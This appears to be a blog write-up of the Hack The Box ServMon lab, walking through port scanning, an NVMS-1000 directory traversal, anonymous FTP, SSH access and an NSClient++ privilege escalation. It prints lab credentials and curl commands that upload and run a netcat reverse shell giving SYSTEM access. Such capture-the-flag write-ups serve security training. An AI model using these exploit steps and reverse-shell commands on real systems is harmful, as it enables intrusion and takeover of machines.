Hackthebox ServMon writeup

Basic Information

Type -Windows
User Blood- sampriti:08 mins, 06 seconds.
Root Blood-sampriti:34 mins, 10 seconds.

Steps involved

1-Port Scanning
2-Searching exploit for NVMS-1000
3-Directory Traversal(Using Burp just POC)
4-FTP enumeration
5-Extracting passwords Using Directory Traversal
6-SSH login into Nadine(user.tx)
7-Revising FTP and Nmap enumerations
8-Checking Service on port 8443
9-Local port forwarding through SSH
10-Searching exploit for NSClient++
11-Exploiting NSClient with CLI
12-Getting Root.txt

Commands involved

1-nmap -sC -sV -O -p- -v -oV
2-ssh [email protected]
3-cd c:\program files\nsclient++
4-type nsclient.ini
5-ssh -L 8443: [email protected](local port forwarding)
6-curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testing1.bat --data-binary "C:\Temp\nc64.exe 4444 -e cmd.exe"
7-curl -s -k -u admin:ew2x6SsGTxjRwXOT https://localhost:8443/api/v1/queries/testing1/commands/execute?time=3m

Port Scan

nmap -sC -sV -O -p- -v -oV
-sV: Probe open ports to determine service/version info
-sC:equivalent to --script=default
-O: Enable OS detection
-p-:full port scan
-v :For verbose
-oV:Saving output to V
Nmap 7.70 scan initiated Mon Apr 13 04:55:26 2020 as: nmap -sC -sV -O -p- -v -oV
Increasing send delay for from 5 to 10 due to 11 out of 36 dropped probes since last increase.
Nmap scan report for
Host is up (0.27s latency).
Not shown: 65516 closed ports
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|01-18-20 12:05PM
Users | ftp-syst: | SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| | |
| | window.location.href = "Pages/login.htm"; |
| | | |
| X11Probe:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F | http-methods: | Supported Methods: GET HEAD POST OPTIONS
|http-title: Site doesn't have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5040/tcp open unknown 5666/tcp open tcpwrapped 6063/tcp open tcpwrapped 6699/tcp open napster? 7680/tcp open pando-pub?
8443/tcp open ssl/https-alt | fingerprint-strings: | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: | HTTP/1.1 404 | Content-Length: 18 | Document not found | GetRequest: | HTTP/1.1 302 | Content-Length: 0 | Location: /index.html | iday | :Saturday
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-01-14T13:24:20
| Not valid after: 2021-01-13T13:24:20
| MD5: 1d03 0c40 5b7a 0f6d d8c8 78e3 cba7 38b4
|_SHA-1: 7083 bd82 b4b0 f9c0 cc9c 5019 2f9f 9291 4694 8334
|_ssl-date: TLS randomness does not represent time
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC

There are a lot of ports open.

FTP seems quite interesting but we will visit it afterwards.

The first thing i always do is visit the website.So I did that only.

Hackthebox ServMon writeup

Searching exploit for NVMS-1000

And we get to the NVMS-1000 login page.

So I looked for the exploit

And got the exploit.

Hackthebox ServMon writeup

Directory Traversal(Using Burp just POC)

So lets try this poc(proof of concept) inside burp .

I captured the GET request .

Hackthebox ServMon writeup

FTP enumeration

It looks like POC is woking.

So now it for time for enumerating information about the directories.

Lets look at ftp.

 [email protected]:~/Desktop/htb/ServMon# ftp
Connected to
220 Microsoft FTP Service
Name ( anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:05PM
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:06PM Nadine
01-18-20 12:08PM Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:08PM 174 Confidential.txt
226 Transfer complete.
ftp> cd ..
250 CWD command successful.
ftp> cd Nathan
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:10PM 186 Notes to do.txt
226 Transfer complete.

I was able to login anonymously and got some .txt files so i downloaded them with the help of get file_name command .

[email protected]:~/Desktop/htb/ServMon# cat Confidential.txt 
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

This means that Passwords are on Nathan’s Desktop.

[email protected]:~/Desktop/htb/ServMon# cat 'Notes to do.txt' 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Extracting passwords Using Directory Traversal

Lets leave it for a second and lets get those pass.txt

Hackthebox ServMon writeup

SSH login into Nadine(user.tx)

So now we have the passwords so lets trying login with them.

And i found that one of the password was for User Nadine

Nadine:[email protected]

Let login into ssh .

Hackthebox ServMon writeup

We can now read the user.txt

Revising FTP and Nmap enumerations

For privilege escalation let’s look at Notes to do.txt

Hackthebox ServMon writeup

It says lock down NSClient Acess

It means NSClient is running on the machine.Moreover Nmap aslo showed that port 8443(https) is open.May be Nsclient be running on that port.

So let’s visit it .

Checking Service on port 8443

Hackthebox ServMon writeup

Local port forwarding through SSH

This means that it is running locally on the machine.

So lets do local port forwarding through ssh

ssh -L 8443: [email protected]

And now visit the site
Hackthebox ServMon writeup

Going into advance and allowing it got me to nsclient++

Hackthebox ServMon writeup

Searching exploit for NSClient++

So let’s find the exploits of it on google.

And found a exploit which can work.

Hackthebox ServMon writeup

Exploiting NSClient with CLI

So i started following it.

cd c:\program files\nsclient++
type nsclient.ini
Hackthebox ServMon writeup

Here is the full file

´╗┐# If you want to fill this file with all available options run the following command:
nscp settings --generate --add-defaults --load-all
If you want to activate a module and bring in all its options use:
nscp settings --activate-module --add-defaults
For details run: nscp settings --help
; in flight - TODO
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts =
; in flight - TODO
; Undocumented key
ssl options = no-sslv2,no-sslv3
; Undocumented key
verify mode = peer-cert
; Undocumented key
insecure = false
; in flight - TODO
; Undocumented key
CheckHelpers = disabled
; Undocumented key
CheckEventLog = disabled
; Undocumented key
CheckNSCP = disabled
; Undocumented key
CheckDisk = disabled
; Undocumented key
CheckSystem = disabled
; Undocumented key
WEBServer = enabled
; Undocumented key
NRPEServer = enabled
; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled
; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA
Scheduler = enabled
; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled
; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be expanded by scripts placed under t
he wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]
; Batch file - Command used for executing wrapped batch files
bat = scripts\%SCRIPT% %ARGS%
; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\lib\wrapper.vbs %SCRIPT% %ARGS%
; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script "%SCRIPT%" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$
; exit($lastexitcode) | powershell.exe /noprofile -command -
; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: command=script arguments
[/settings/external scripts/scripts]
; Schedules - Section for the Scheduler module.
; Undocumented key
foobar = command = foobar
; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true

And got the password

password = ew2x6SsGTxjRwXOT

Now lets uploads all the tools and script needed for the exploit in the temp directory.

I used scp that purpose

Hackthebox ServMon writeup
scp nc.exe [email protected]:/Temp/nc.exe

Now according to the exploit we have to create a .bat file.

I did the further steps from terminal only as the website was down every time.

curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testing1.bat --data-binary "C:\Temp\nc64.exe 4444 -e cmd.exe"
curl -s -k -u admin:ew2x6SsGTxjRwXOT https://localhost:8443/api/v1/queries/testing1/commands/execute?time=3m
-s --silent Silent mode
-k, --insecure Allow insecure server connections when using SSL
-u username
-X, --request Specify request command to use

The path can be know through the api or the website .Its also something of hit an trial moreover i took help of google to understand the directory structure .

Hackthebox ServMon writeup

And on the nc we must get a reverse shell

Getting Root.txt

Hackthebox ServMon writeup

Lets read the root.txt

C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
nt authority\system

Thanks for reading the writeup.If you liked it please show your support.

How useful was this post?

Click on a star to rate it!

Average rating 3.4 / 5. Vote count: 5

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Leave a Comment